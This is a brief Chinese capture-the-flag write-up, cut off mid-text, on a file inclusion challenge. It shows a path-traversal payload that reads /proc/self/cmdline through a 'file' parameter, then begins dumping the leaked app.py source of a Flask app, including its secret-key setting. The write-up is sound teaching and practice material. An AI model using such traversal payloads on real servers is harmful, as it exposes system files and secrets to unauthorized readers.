该题考察文件包含漏洞
正文
看到file参数,考虑文件读取
读取当前进程的命令行参数
?file=../../../../proc/self/cmdline
读取app.py:
b'import os\nimport uuid\nfrom flask import Flask, request, session, render_template, Markup\nfrom cat import cat\n\nflag = ""\napp = Flask(\n __name__,\n static_url_path=\'/\', \n static_folder=\'static\' \n)\napp.config[\'SECR